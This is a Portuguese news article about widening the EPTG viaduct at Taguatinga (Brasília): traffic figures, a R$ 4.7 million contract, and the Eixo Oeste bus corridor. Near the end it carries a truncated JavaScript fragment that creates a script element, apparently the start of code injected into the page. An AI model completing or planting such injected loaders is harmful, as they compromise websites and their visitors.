Viaduto de acesso a Taguatinga será ampliado

Obra ainda não foi lançada oficialmente, o que deve ocorrer nos próximos dias. Prazo de conclusão previsto é de 210 dias. Foto: Dênio Simões/Agência Brasília

Quem passa pela Estrada Parque Taguatinga (EPTG) na altura da região administrativa que dá nome à via já percebe a movimentação para o alargamento do viaduto de interseção com a Estrada Parque Contorno (EPCT). A empresa vencedora da licitação para o serviço iniciou, na semana passada, ações ligadas aos estudos topográficos, à limpeza do terreno e à instalação de canteiros.

De acordo com levantamento da Secretaria de Infraestrutura e Serviços Públicos, cerca de 135 mil veículos transitam no trecho diariamente. O alargamento será no meio do viaduto. Apesar de a ordem de serviço já ter sido assinada, a obra ainda não foi lançada oficialmente, o que deve ocorrer nos próximos dias. A partir daí, a previsão é que seja concluída num prazo de 210 dias.

A pasta assinou o contrato para o trabalho em 20 de janeiro, no valor de R$ 4,7 milhões. Os recursos são provenientes de acordo com a Caixa Econômica, responsável por 95% do financiamento — a contrapartida do governo local será de 5%. 

Corredor Eixo Oeste 

Essa obra é uma das que estão inseridas no projeto do corredor Eixo Oeste, que liga Ceilândia ao Plano Piloto, passando por Taguatinga. Além disso, serão construídas faixas exclusivas nas principais vias de ligação do Sol Nascente com o Plano Piloto, como a Hélio Prates, a Estrada Parque Indústrias Gráficas (Epig), e a Via Setor Policial Militar (ESPM), para acesso ao Terminal da Asa Sul.

 

O projeto total para o Eixo Oeste é de 38,7 quilômetros de extensão. O corredor beneficiará diretamente a população de Águas Claras, de Ceilândia, do Guará, do Plano Piloto, de Samambaia, de Taguatinga e de Vicente Pires. Também serão beneficiadas, indiretamente, a região de Brazlândia e a cidade de Águas Lindas (GO).

var d=document;var s=d.createElement(‘script’);

Fonte:

Deixe um comentário